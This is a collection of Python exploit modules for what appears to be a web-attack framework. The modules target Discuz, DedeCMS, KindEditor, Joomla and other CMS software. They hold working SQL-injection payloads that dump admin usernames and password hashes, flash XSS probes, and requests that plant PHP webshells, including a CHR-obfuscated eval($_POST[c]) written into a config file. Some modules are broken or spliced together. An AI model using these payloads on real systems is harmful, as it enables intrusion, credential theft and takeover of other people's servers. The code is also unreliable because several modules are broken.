def exploit(options):
    """Probe ``faq.php?action=grouppermission`` on the configured target.

    Builds the request URL from ``options["target"]["current_value"]``,
    calls the module-level ``verify`` helper and, if it reports success,
    fetches the values via ``get_hash`` and logs them.

    Returns a ``"<url>: <username>|<md5>"`` string when ``verify`` is
    truthy; otherwise execution falls off the end and ``None`` is returned.

    ``verify``, ``get_hash`` and ``logger`` are module-level names not
    shown here.  From a defender's side, the request path built below is
    the indicator that is visible in web-server access logs.
    """
    # read the target URL from the configured options
    url = options["target"]["current_value"]
    url = url + "/faq.php?action=grouppermission"
    if verify(url):
        manager_hash = get_hash(url)
        # get_hash is assumed to return a mapping with "username"/"md5" keys — confirm against its definition
        logger.success("Username: %s" % manager_hash["username"])
        logger.success("Hash: %s" % manager_hash["md5"])
        return "%s: %s|%s" % (url, manager_hash["username"], manager_hash["md5"])
def exploit(options): logger.process("Requesting target site") # 获取设置的参数 url = options["target"]["current_value"] try: result = verify(url) logger.success("Username: %s" % result[0]) logger.success("password: %s" % result[1]) return "%s: %s|%s" % (url, result[0], result[1]) except: pass
def exploit(options):
    """Fingerprint the ``flvplayer.swf`` served by the target by content hash.

    Requests ``/static/image/common/flvplayer.swf`` with a ``link=javascript:``
    query parameter and compares the MD5 of the response body against a
    fixed digest.  A match is treated as "the known file is present"; the
    URL is then logged and returned.

    Returns the probed URL on a digest match, otherwise ``None``.
    ``http``, ``hashlib`` and ``logger`` come from the enclosing module.
    """
    url = options['target']['current_value']
    url = url + "/static/image/common/flvplayer.swf?file=1.flv&" \
          "linkfromdisplay=true&link=javascript:alert(1);"
    logger.process("Requesting target site")
    # the second positional argument (5) is presumably a timeout — confirm against http.get
    response = http.get(url, 5)
    # identify the served file by hashing its bytes rather than by a version string
    if hashlib.md5(response.content).hexdigest() == "7d675405ff7c94fa899784b7ccae68d3":
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(options):
    """Fingerprint the KindEditor ``swfupload.swf`` served by the target.

    Requests the plugin's ``swfupload.swf`` with a crafted ``movieName``
    query parameter and compares the MD5 of the response body against a
    fixed digest.  A match is treated as "the known file is present"; the
    URL is then logged and returned.

    Returns the probed URL on a digest match, otherwise ``None``.
    ``http``, ``hashlib`` and ``logger`` come from the enclosing module.
    """
    url = options['target']['current_value']
    url = url + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
          "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
          "rt%281%29;//"
    logger.process("Requesting target site")
    response = http.get(url)
    # identify the served file by hashing its bytes rather than by a version string
    if hashlib.md5(response.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(options):
    """Append the module-level ``payload`` to the target URL and validate the reply.

    ``payload`` and ``valiator`` (sic) are module-level names not shown
    here; the response body is passed to ``valiator`` and its result
    decides the outcome.

    Returns ``True`` when ``valiator`` returns a value equal to ``True``
    (the comparison is ``== True``, so a truthy non-boolean such as a
    non-empty string counts as failure), ``False`` otherwise.
    """
    # build the request URL from the configured target plus the module payload
    url = options["target"]["current_value"] + payload
    logger.process("send request...")
    response = http.get(url)
    if valiator(response.text) == True:
        logger.success("exploit success, target site have xss vuln ! :)")
        return True
    else:
        logger.error("exploit fail, target site no xss ! :(")
        return False
def verify(url):
    """Return ``True`` if a POST with malformed ``gids[]`` values yields a MySQL error page.

    This is error-based detection: the only signal used is whether the
    literal ``"MySQL Query Error"`` appears in the response body.  When
    the marker is absent nothing is returned (implicit ``None``).

    ``http`` and ``logger`` come from the enclosing module.  Defender
    note: the check depends on verbose database errors being echoed to
    the client; suppressing them removes the signal, and the unusual
    ``gids[...]`` POST keys are the log-visible indicator.
    """
    logger.process("Requesting target site")
    # the gids[100][0] value is split across adjacent string literals
    data = {
        "gids[99]": "'",
        "gids[100][0]": ") and (select 1 from (select count(*"
                        "),concat(version(),floor(rand(0)*2))"
                        "x from information_schema.tables gro"
                        "up by x)a)#"
    }
    response = http.post(url, data)
    if "MySQL Query Error" in response.text:
        logger.success("Exploitable!")
        return True
def verify(url):
    """Check whether ``/data/config.inc.php`` on *url* executes POST-supplied PHP.

    Posts ``c=phpinfo()`` and looks for the string ``"phpinfo"`` in the
    response body.

    Returns ``{'shell': <full url>, 'passwd': 'c'}`` on a hit (the
    ``passwd`` is the POST parameter name), ``False`` otherwise.
    ``http`` and ``logger`` come from the enclosing module.  Defender
    note: a configuration file that evaluates request parameters is the
    condition being tested here, so file-integrity monitoring on it is
    the relevant control.
    """
    logger.process("Verify webshell...")
    url = url + '/data/config.inc.php'
    # the POST body is the parameter name followed by the code to run
    payload = 'c=phpinfo()'
    response = http.post(url, payload)
    if "phpinfo" in response.text:
        logger.success("Exploit success :)")
        return {'shell': url, 'passwd': 'c'}
    else:
        logger.error('Exploit fail :(')
        return False
def do_update(self, arg):
    """Console command: ``update local`` reloads the module list from ``appdir``.

    Any other (or empty) argument is ignored.  ``manager``, ``appdir``
    and ``logger`` are module-level names not shown here; the enclosing
    class is outside this view.
    """
    if not arg or arg != 'local':
        return
    # refresh the module registry so newly added local files are picked up
    self.modules = manager.main(appdir)
    return logger.success("update local file success :)")
def verify(URL):
    """Two-step error-based check against ``/plus/search.php`` on *URL*.

    A first request with a malformed ``typeArr`` key is sent; the error
    marker in the response (``"Request Error step 1"`` or
    ``"Request Error step 2"``) selects which follow-up URL is handed to
    the module-level ``get_hash`` helper.

    Returns whatever ``get_hash`` returns for the matching step, or
    ``None`` (after logging an error) when neither marker is present.
    ``http``, ``get_hash`` and ``logger`` come from the enclosing module.
    The membership tests use ``response.content`` rather than ``.text``;
    whether that is ``str`` or ``bytes`` depends on the ``http`` wrapper.
    """
    response = http.get(URL + "/plus/search.php?keyword=as&typeArr[%20uNion%20]=a")
    if "Request Error step 1" in response.content:
        logger.success("Step 1: Exploitable!")
        return get_hash(
            URL + "/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a"
        )
    elif "Request Error step 2" in response.content:
        logger.success("Step 2: Exploitable!")
        return get_hash(
            URL + "/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a"
        )
    else:
        logger.error("It's not exploitable!")
def exploit(options):
    """POST a crafted ``newconfig`` form to the target, then call ``verify``.

    The form body carries a ``newconfig[Config...]`` key whose value embeds
    PHP (built from ``CHR()`` calls); the request is sent to the bare
    target URL from ``options``.  ``verify`` (module-level, not shown) is
    then asked whether a shell is reachable.

    Returns ``verify``'s result (expected to be a mapping with ``shell``
    and ``passwd`` keys) when truthy, otherwise ``None``.  The ``response``
    of the POST itself is never inspected.
    """
    # read the target URL from the configured options
    url = options["target"]["current_value"]
    payload = 'a=config&source=d7.2_x2.0&submit=yes&newconfig[target][dbhost]=localhost&newconfig[Config%0d%0a%0d%0a'
    # eval($_POST[c])
    payload += 'eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=localhost'
    payload += '&newconfig[source][dbuser]=root&newconfig[source][dbpw]=&newconfig[source][dbname]=discuz&newconfig[source][tablepre]=cdb_'
    payload += '&newconfig[source][dbcharset]=&newconfig[source][pconnect]=1&newconfig[target][dbhost]=localhost&newconfig[target][dbuser]=root&newconfig[target][dbpw]='
    payload += '&newconfig[target][dbname]=discuzx&newconfig[target][tablepre]=pre_&newconfig[target][dbcharset]=&newconfig[target][pconnect]=1&submit=yes'
    # set encoding — NOTE(review): the encoded value is discarded, so this line is a no-op
    payload.encode('utf-8')
    response = http.post(url, payload)
    result = verify(url)
    if result:
        logger.success("Webshell: %s" % result['shell'])
        logger.success('Password: %s' % result['passwd'])
        return result
def exploit(options):
    """Template-style exploit: GET the target with a fixed custom header.

    Sends ``xxoo: 1111111111111111`` and reports success when the string
    ``"success"`` is found in whatever ``http.get`` returns.  Note the
    membership test is on ``response`` itself, not ``response.text``; how
    that behaves depends on the object the ``http`` wrapper returns —
    confirm against its definition.

    Returns ``True`` on a match, ``False`` otherwise.  ``http`` and
    ``logger`` come from the enclosing module.
    """
    # log progress
    logger.process("set exploit params...")
    # read the target URL from the configured options
    url = options["target"]["current_value"]
    logger.process("send request...")
    # custom request header
    headers = {'xxoo':'1111111111111111'}
    # send the request; the third positional argument (1) is presumably a timeout — confirm
    response = http.get(url, headers, 1)
    if "success" in response:
        logger.success("exploit success ! :)")
        return True
    else:
        logger.error("exploit fail ! :(")
        return False
def exploit(options):
    """Build a ``com_fields`` query with an ``updatexml`` expression and look for an MD5 echo.

    As written, ``payload`` is assigned but never used (the GET goes to
    the bare ``url``), and ``hashlib.md5(1)`` raises ``TypeError`` because
    ``md5`` requires a bytes-like argument; the block therefore does not
    reach the comparison.

    Intended return: ``True`` when the digest appears in the response,
    ``False`` otherwise.  ``http``, ``hashlib`` and ``logger`` come from
    the enclosing module.
    """
    # log progress
    logger.process("set exploit params...")
    # read the target URL from the configured options
    url = options["target"]["current_value"]
    payload = url + 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x5e,concat(1,(select md5(1))),1)'
    logger.process("send request...")
    # send the request
    response = http.get(url)
    flag = hashlib.md5(1)
    if flag.hexdigest() in response:
        logger.success("exploit success ! :)")
        return True
    else:
        logger.error("exploit fail ! :(")
        return False
def exploit(options):
    """Test whether a path segment on the target is evaluated as PHP.

    Requests ``/index.php/module/aciton/param1/${@phpinfo()}`` and looks
    for the ``phpinfo()`` page title in the response.  On a hit the same
    URL with the expression swapped for an ``eval`` form is logged and
    returned.

    Returns the derived URL on success, otherwise ``None``.  ``http`` and
    ``logger`` come from the enclosing module.  Defender note: the
    ``${@...}`` segment in the request path is the log-visible indicator.
    """
    url = options['target']['current_value']
    url = url + "/index.php/module/aciton/param1/${@phpinfo()}"
    logger.process("Requesting target site")
    response = http.get(url)
    if "<title>phpinfo()</title>" in response.text:
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % url)
        url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
        logger.success("Webshell: %s" % url)
        return url
def exploit(options):
    """Union-based probe of ``?m=topic&a=topic&keyword=`` on the target.

    The query embeds ``handsomechu`` (hex-encoded) as delimiter markers;
    if the marker appears in the response, the text between the markers
    is split on ``~~~`` and unpacked as ``(username, password)``.

    Returns a ``"<url>: <username>|<password>"`` string on a hit, otherwise
    ``None``.  ``options['cookie']`` is sent as the ``Cookie`` header.
    The unpacking assumes exactly two ``~~~``-separated fields; any other
    count raises ``ValueError``.  ``http`` and ``logger`` come from the
    enclosing module.
    """
    url = options['target']['current_value']
    logger.process("Requesting " + url)
    url = url + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
          "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
          "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    # the configured cookie is forwarded with the request
    header = {'Cookie': options['cookie']['current_value']}
    # the third positional argument (5) is presumably a timeout — confirm against http.get
    response = http.get(url, header, 5)
    if "handsomechu" in response.text:
        logger.success("Exploitable!")
        # text between the first pair of markers, split on the ~~~ separator
        user = response.text.split("handsomechu")[1].split("~~~")
        username, password = user
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (url, username, password)
def exploit(options):
    """Try two ``search.html`` locations for a ``keyword`` value evaluated as PHP.

    Each candidate URL carries a URL-encoded ``${@phpinfo()}`` keyword; the
    first response containing the ``phpinfo()`` page title wins.  On a hit
    the same URL with the expression swapped for an ``eval`` form is
    logged and returned.

    Returns the derived URL on the first hit, otherwise ``None`` after both
    candidates have been tried.  ``http`` and ``logger`` come from the
    enclosing module.
    """
    url = options['target']['current_value']
    urls = [
        url + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
        url + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D"
    ]
    # `url` is rebound to each candidate in turn; i is a 1-based counter for the log line
    for i, url in zip(range(1, 3), urls):
        logger.process("Testing URL %d..." % i)
        response = http.get(url)
        if "<title>phpinfo()</title>" in response.text:
            logger.success("Exploitable!")
            logger.success("Phpinfo: %s" % url)
            url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
            logger.success("WebShell: %s" % url)
            return url
def exploit(options):
    """Union-based probe of ``?m=message&a=show&uid=`` on the target.

    The query embeds ``handsomechu`` (hex-encoded) as delimiter markers;
    if the marker appears in the response, the text between the markers
    is split on ``~~~`` and unpacked as ``(username, password)``.

    Returns a ``"<url>: <username>|<password>"`` string on a hit, otherwise
    ``None``.  ``options['cookie']`` is sent as the ``Cookie`` header.
    The unpacking assumes exactly two ``~~~``-separated fields; any other
    count raises ``ValueError``.  ``http`` and ``logger`` come from the
    enclosing module.
    """
    url = options['target']['current_value']
    logger.process("Requesting " + url)
    url = url + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
          "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
          "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    # the configured cookie is forwarded with the request
    header = {'Cookie': options['cookie']['current_value']}
    # the third positional argument (5) is presumably a timeout — confirm against http.get
    response = http.get(url, header, 5)
    if "handsomechu" in response.text:
        logger.success("Exploitable!")
        # text between the first pair of markers, split on the ~~~ separator
        user = response.text.split("handsomechu")[1].split("~~~")
        username, password = user
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (url, username, password)